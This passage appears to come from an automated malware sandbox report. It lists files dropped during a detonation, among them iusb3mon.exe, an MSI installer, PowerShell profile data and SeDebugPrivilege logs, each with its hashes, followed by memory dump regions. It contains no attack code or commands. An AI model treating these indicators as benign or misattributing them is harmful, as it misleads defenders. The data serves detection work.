      Filesize

      1.6MB

      MD5

      e4a56c99aa4dd15cf1c65fff7ba44f01

      SHA1

      533deccda72e47da9219cf34a5569aac05d7fba8

      SHA256

      1b54aeacf41cc2f93dcb78ebfea322058e76b1b7473cf3369ef6e5be190a9a31

      SHA512

      b4ea868fb956f254f34d1ce541d9475566b5f584bba702be0045fc4c76645767f8f8230a17550a5ada3d836d7ff05f680429c9a98945982a84d301eb26626b13

    • C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

      Filesize

      3KB

      MD5

      69c282fdcd177c1ac4d6709ef841da65

      SHA1

      575cbac132f5215c9446e6b440ca44a2082f0644

      SHA256

      943f169c31c319417e61586d8911057321de04926e01e4cc3e6f57b3b032c28e

      SHA512

      6b686a5d6aabe4681c6e1c83d4f32bd55d9fa26fc25ed72ecd20676c6dd3bd49cee4f1e5d1b25f2d3a90a994be00bf3b1366075272d4c3ea16917806dbbe0ea7

    • C:\ProgramData\Microsoft\Program\ziliao.jpg

      Filesize

      225KB

      MD5

      72bc16ece8424c5ff7a8646825eacb67

      SHA1

      badf8f92fbcae86ab17010c2f7012bcfecdbf3af

      SHA256

      9747c5d9d05c1b804d551ff762a33daa7df8eeeb66013a52de2712d7bbc30ba8

      SHA512

      d61d6188d6df70f2f5d3564c441a96dc4251bf9133f8d5d1d2acec559ffff3603a6033423df1a7d64974ab59468a60d4af48ce0db0d3bde241084a94a02f1dba

    • C:\ProgramData\Program\iusb3mon.exe

      Filesize

      2.7MB

      MD5

      8f18e2aa757214f05236d018b4bf11d7

      SHA1

      35a441218070c7ba05f6cad1ac7494f10a498df7

      SHA256

      988b6080aa7ce8c74cc5cf6910a08a310802b688e3cf9e8da75b48e29542d229

      SHA512

      13add8ba69ee6bda18a965720c541073ba39f236bd4def095247eecdb3795c2f2203f133705d205a18c5f7a92d7921c8c9a0741c7e6eaae832cc716f30772d6c

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      1KB

      MD5

      def65711d78669d7f8e69313be4acf2e

      SHA1

      6522ebf1de09eeb981e270bd95114bc69a49cda6

      SHA256

      aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

      SHA512

      05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      15KB

      MD5

      cbc387ba90282ea724cef3f7129edf05

      SHA1

      276ee1dd3aa57ea39067616b511280f3aa781ad0

      SHA256

      920c3caac03017008cbe4de26713ef5c242e9dbe893db3405e19773d8dd3b242

      SHA512

      1cf7e9a79c51e3e5c888843a2f742c21410b427c94ac37cdcd936b4b4943382dc77c936017ba55556ab108153bc480d7690dba17318e3e3b5652e77813c402ba

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      d2ecd259fa7f4d65a9c461f95aeae119

      SHA1

      e2d376a2ef112b0937675f77628e8ebc595cc17a

      SHA256

      ad853c4f581972ca2ffbe535ea5963d17124e65c55bd119a491b36f11081f35a

      SHA512

      5c0ed7d571dacad0f240fe04ec5e428606da73de4fb039ec67d15f6252fec3a764fcce5a25e9763c613faa13c7a532e91830fd6948af281ac96ab1a51a585e4d

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      29470d8e85baa3a18bfeb78e70e71d5c

      SHA1

      fd1f272ae4d418f4af6f8f172fd965dc7d6c4501

      SHA256

      3451fd98d0543f0f8dfb8d6f2bc4f57014b962f90cb0ecd627c363ed13232719

      SHA512

      aa469b177a015415566ea22717260366c36e171ba2c3380deacfccb4018bad81b763ed0559ae4b61525e8d74bf20ea456a696da74be8f6d582a1f46e0f5e5f66

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      1ed3941f58f9345e36597f0e8ba04a87

      SHA1

      4b62aaf8804ee677b2d431662932d2f64e6714e1

      SHA256

      8c65b078ce71ad8fc1a4b4b758817730e6ccbe7f8819bac84a090a581d6fec22

      SHA512

      7d8157d4db8effe78cdc4e48f0dbe732337f4266089574b787ebd9b1a3e37eebe921bfa60558da253e19442979de572bdb852455830405169fefe2a9d1c59725

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      15KB

      MD5

      a4a4733c049edad87ec59efd20f7301d

      SHA1

      4460e891c449891e176461125e8efd07fb375838

      SHA256

      668edc86a9da45ee644e725db96a32834725305d73a8ec6509ea3da50361d8ee

      SHA512

      899b39f10b44f6969d2352ac80f76d1f4b4299558ecda040b369dd0b3d3f520f491d4d1a20b4a249d18265d117068a0c516525ae0caa7439dedeca34eea9e9e9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      3cd3c16a5cd990b14daf4893b8a151e4

      SHA1

      b094a5bbb84cf3ce2bc12fff15aafeb4764479b6

      SHA256

      d7515d4b2599c1b479697639d8101d21287693f28c497b261d0fe709afa56f35

      SHA512

      998bcb18c4306af052b9fcc68458ffd8347f06e8ebec541e6d22daa69f05e37455cd422ea3c8bb42ac7d93ec3492e382d38acc148daadbd944dee0affe824c09

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      15KB

      MD5

      cf5636b7ae29940aaa16f8f3719c93ec

      SHA1

      b16eed0cb716b14ab07bcd695b976435813d44bc

      SHA256

      d4d422c5db683650d9f87b0051bde80802bf3ced20e2d744bbf03696cc2f20b2

      SHA512

      3224627a3b292a7372d54764b0f8a99a273a2eaae1e0a941301e4b18eb4a355a9a08916d585dcb7c135b9b5bb4b4610e110da520f769f6196237978714d2d25e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      2d68b4e3dd3db8853e425962f901f75c

      SHA1

      46f3ae5b2c96620b78f76019d8133dd360ccca37

      SHA256

      dd648c3a7a60c8d1cb86d4f50931f542e2ccd2e4744a2fcc8e56b27bbc5dc5ce

      SHA512

      2b759d9ec2daf1341ebadfd1dc25268e6aa2fc59292169bff344b77fac65d64f8778433b0eb74db8ced5df65bd1538d50770dc70de45aa4451e50e5d7c0e2864

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      1ea52f140e49fa12203ec0193b666f82

      SHA1

      384713fa088539e0a28c180cc47ab2a4810ede23

      SHA256

      bcd22d02f431416b64b01f6d678e672eebca9d5d81eb1c52371ef01ac06e8652

      SHA512

      77bf95fd4ffba94973603d774e5ec010617a1214a486f6d9b689bf915b409a5417aa38b2cd6982e08b24bf358785b5f31b1310c1815b5859a9905c81fb6f27d9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      f4198dd2e3a60fbf2d50e935b85e9864

      SHA1

      08255cf8b6e2a7b71b91f34bfadbdd9ec8bc35fa

      SHA256

      18ba7a6428a5ade2d2b2c37afd343fa4b3fdb3175aaa0edd7a5e8ad9d2e86dbf

      SHA512

      0ad61e8ac24d78b61c9337d5f7df69361340b66c24f866a9ad818ea3e445047132ea126ea32a1ce60f5396ea0356d7877ea31e71eb46f5cd4ae05ef743a6d71b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      15KB

      MD5

      35093815cc5a7eb69fa05d987cfca7fa

      SHA1

      9fc2ecf23948304904fa34d89e6a304fa0aa9253

      SHA256

      e33e08b8b062b6ea765ac56a7c7991f161214a7e7a7e02959d2ffc21b36a8da8

      SHA512

      c6be677f8e6fc406856ed7d8bebc871db5b3697a4d4dac07529feb75558bdaa5059050fab377a735f1212202d96dfedc2295aa9dc65db9b94c1badd36296f96c

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      15KB

      MD5

      83ddfe4ce968caaf3777cff9d8535190

      SHA1

      6bad64d51f27945180a54e43858f96a378613a18

      SHA256

      9250e0b8de7eaa7ae94fdfb57b5dedb83c859ef1bdc254a5620bfa447fc1e6fd

      SHA512

      80aca73883fafb2d12e0f52d98e440d6fcf9abaf13845f01aff6f8bb876a0d75a781700b862013920a5059e412c67446480814ee49b7a94c0e1a353e445f8900

    • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log

      Filesize

      2KB

      MD5

      c6f29cf6f15bc123d0ac663038ccf886

      SHA1

      ad32e0b495d9d8e55265a3d5b0d6aad1f2123563

      SHA256

      467ef56719b3c527d861fb7874b121c8042500e86a15e04bbcef9b20834b6884

      SHA512

      c455195328246088393590197a08b19e530823510fe76247c786b96eb1ca32160969527b4eef571acef01b54d6406b04fe0cfb5a98b32290fe9fdd5c67ff23cc

    • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log

      Filesize

      694B

      MD5

      aa1f8074f35baaf7e337410dfd940433

      SHA1

      6a0b7cbeffa62605465c1d67acd07b19b60d5e0b

      SHA256

      25af234a30f30669c256822b25cc625271701b4f1e63ca4aa6ec627f0693689d

      SHA512

      5a24951ede7169779ecc69f682292269a80d36189d9a54a6c54d4621842b40f04781e9318d9b4839d608cc6c353bd1f5e8964ccd2e6d69190640c2346e1f9212

    • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log

      Filesize

      2KB

      MD5

      e56fb06f9a607aa6c8152a4fc8e96706

      SHA1

      bc38d07f503c3c49fe6e84a8022d53ac93082446

      SHA256

      dbd0fd8d055836f959b37fdace40b39eee306817c41da62e9fd34fa2d5196a12

      SHA512

      d7f370f50719df1c1622354d2093cd65ffd9223a2a09674eae47d52b713bd6cf84be215dddc8c2f1480cb12173c2251a3a83409ac6267bda46248b922df3265d

    • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log

      Filesize

      2KB

      MD5

      5a18280aed20e8cc704c6211597e4195

      SHA1

      4286c3091e9bd83e03f1dd3b498b26b5cfb3741d

      SHA256

      4ef2d1e0d41531cbf24b559261586d4abb7f3aaa8637bd895f630ed3b1d3ba45

      SHA512

      49051747339cd89a2d3892f8b133ef60ff696681cdeaa257039763c37c8d606904c6b2ca3c623adf1a2d7002f5f44f1418fea017d9fc42ef688d3d2b2230dd85

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nru5axey.vwr.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Windows\Installer\MSID486.tmp

      Filesize

      990KB

      MD5

      b9ff2dd6924711531e59e90581cda548

      SHA1

      6c8d572587c40a1fd8c20bd4f1929bb0fbb12009

      SHA256

      ad564d4d64bb74ea6819e081534131f6f78e3c019d37abbc3eef8e09dfed96d7

      SHA512

      d026c8128c1a182aa7f9d7cba179b411ad679e3bf89723a3498ab493cb6938579ee703ade35595f6b5178413e0df7f6f9a152a5036759e42f1d6f52cc0a61227

    • C:\Windows\Installer\e57d438.msi

      Filesize

      4.3MB

      MD5

      ec6e20cf1e3298163f08b2166ba9fa33

      SHA1

      2e829c7f7ab05279b2af14f61c8265e0ebbc32db

      SHA256

      41241f3bc8472cba920e35528728ed3a1070aa6b48c50b34ad3f5dcf0dd4d9bb

      SHA512

      88449b0e10e9f6762a173ea2bb4853c38bb3864a83a97024fa7138ca2e8657daf03c1aa5def0b629d775a0e7f45d9e9b11b27e626f1b9a10ec1a91f90fbf8aa3

    • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

      Filesize

      23.7MB

      MD5

      e7f69a1f815b45e2d176d1b9d3c6e3ec

      SHA1

      9321c08c9a20b8f3f1224f145f20e31fafd3e6af

      SHA256

      20df8fc131247efcbaaa4fef77cd4b0e165583e6f78d386e5242a4db6653f89f

      SHA512

      734e83e81608d84a744f19649a743765d517e01dd55ff28651d3b54eeeb0f3e21f1bcea1aa3fedcc54893520493c26d9f6de973e9bc01e1f34017d264c804a99

    • \??\Volume{fa3589b5-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{eaa05e44-60c7-4bfd-a06c-41d9ec44e5bd}_OnDiskSnapshotProp

      Filesize

      6KB

      MD5

      c6d5cfb390738935ced5b6cf4137f2d8

      SHA1

      e5445de7a40b4a914f64510c7b10701fc3b61db9

      SHA256

      6c2e1272dca0d3df2eda6fd4f76eacd04a68d0ace79b0610383d5a60c58ebc09

      SHA512

      8de90507a5abd6d0b7b36d81240d3d2ee52291f929df1950a69af5725b8b381e156a6edf586a2c93d28810a1361022fd1cb857944fdaba4728ee06e8dd749954

    • \??\c:\inst.ini

      Filesize

      2B

      MD5

      81051bcc2cf1bedf378224b0a93e2877

      SHA1

      ba8ab5a0280b953aa97435ff8946cbcbb2755a27

      SHA256

      7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

      SHA512

      1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

    • memory/728-128-0x0000000005960000-0x0000000005CB4000-memory.dmp

      Filesize

      3.3MB

    • memory/2528-56-0x0000000005AB0000-0x0000000005E04000-memory.dmp

      Filesize

      3.3MB

    • memory/2908-169-0x0000000005DE0000-0x0000000005E2C000-memory.dmp

      Filesize

      304KB

    • memory/3284-297-0x00000000056E0000-0x0000000005A34000-memory.dmp

      Filesize

      3.3MB

    • memory/3812-31-0x0000000007E70000-0x0000000008414000-memory.dmp

      Filesize

      5.6MB

    • memory/3812-13-0x0000000005860000-0x0000000005882000-memory.dmp

      Filesize

      136KB

    • memory/3812-11-0x0000000005230000-0x0000000005266000-memory.dmp

      Filesize

      216KB

    • memory/3812-12-0x0000000005960000-0x0000000005F88000-memory.dmp

      Filesize

      6.2MB

    • memory/3812-14-0x0000000006100000-0x0000000006166000-memory.dmp

      Filesize

      408KB

    • memory/3812-30-0x0000000006D70000-0x0000000006D92000-memory.dmp

      Filesize

      136KB

    • memory/3812-29-0x0000000006D20000-0x0000000006D3A000-memory.dmp

      Filesize

      104KB

    • memory/3812-28-0x00000000077C0000-0x0000000007856000-memory.dmp

      Filesize

      600KB

    • memory/3812-27-0x0000000006820000-0x000000000686C000-memory.dmp

      Filesize

      304KB

    • memory/3812-26-0x0000000006800000-0x000000000681E000-memory.dmp

      Filesize

      120KB

    • memory/3812-25-0x00000000061E0000-0x0000000006534000-memory.dmp

      Filesize

      3.3MB

    • memory/3812-15-0x0000000006170000-0x00000000061D6000-memory.dmp

      Filesize

      408KB

    • memory/4668-357-0x0000000000400000-0x00000000006BF000-memory.dmp

      Filesize

      2.7MB

    • memory/4668-121-0x0000000004750000-0x0000000004790000-memory.dmp

      Filesize

      256KB

    • memory/4668-354-0x0000000000400000-0x00000000006BF000-memory.dmp

      Filesize

      2.7MB

    • memory/4668-355-0x0000000000400000-0x00000000006BF000-memory.dmp

      Filesize

      2.7MB

    • memory/4668-350-0x0000000000400000-0x00000000006BF000-memory.dmp

      Filesize

      2.7MB

    • memory/4668-170-0x0000000004750000-0x0000000004790000-memory.dmp

      Filesize

      256KB

    • memory/4668-348-0x0000000000400000-0x00000000006BF000-memory.dmp

      Filesize

      2.7MB

    • memory/4668-349-0x0000000000400000-0x00000000006BF000-memory.dmp

      Filesize

      2.7MB

    • memory/4668-362-0x0000000000400000-0x00000000006BF000-memory.dmp

      Filesize

      2.7MB

    • memory/4668-278-0x0000000004750000-0x0000000004790000-memory.dmp

      Filesize

      256KB

    • memory/4668-116-0x0000000000400000-0x00000000006BF000-memory.dmp

      Filesize

      2.7MB

    • memory/4668-356-0x0000000000400000-0x00000000006BF000-memory.dmp

      Filesize

      2.7MB

    • memory/4668-127-0x0000000004750000-0x0000000004790000-memory.dmp

      Filesize

      256KB

    • memory/4668-358-0x0000000000400000-0x00000000006BF000-memory.dmp

      Filesize

      2.7MB

    • memory/4668-359-0x0000000000400000-0x00000000006BF000-memory.dmp

      Filesize

      2.7MB

    • memory/4668-360-0x0000000000400000-0x00000000006BF000-memory.dmp

      Filesize

      2.7MB

    • memory/4668-361-0x0000000000400000-0x00000000006BF000-memory.dmp

      Filesize

      2.7MB

    • memory/4676-44-0x0000000005BC0000-0x0000000005F14000-memory.dmp

      Filesize

      3.3MB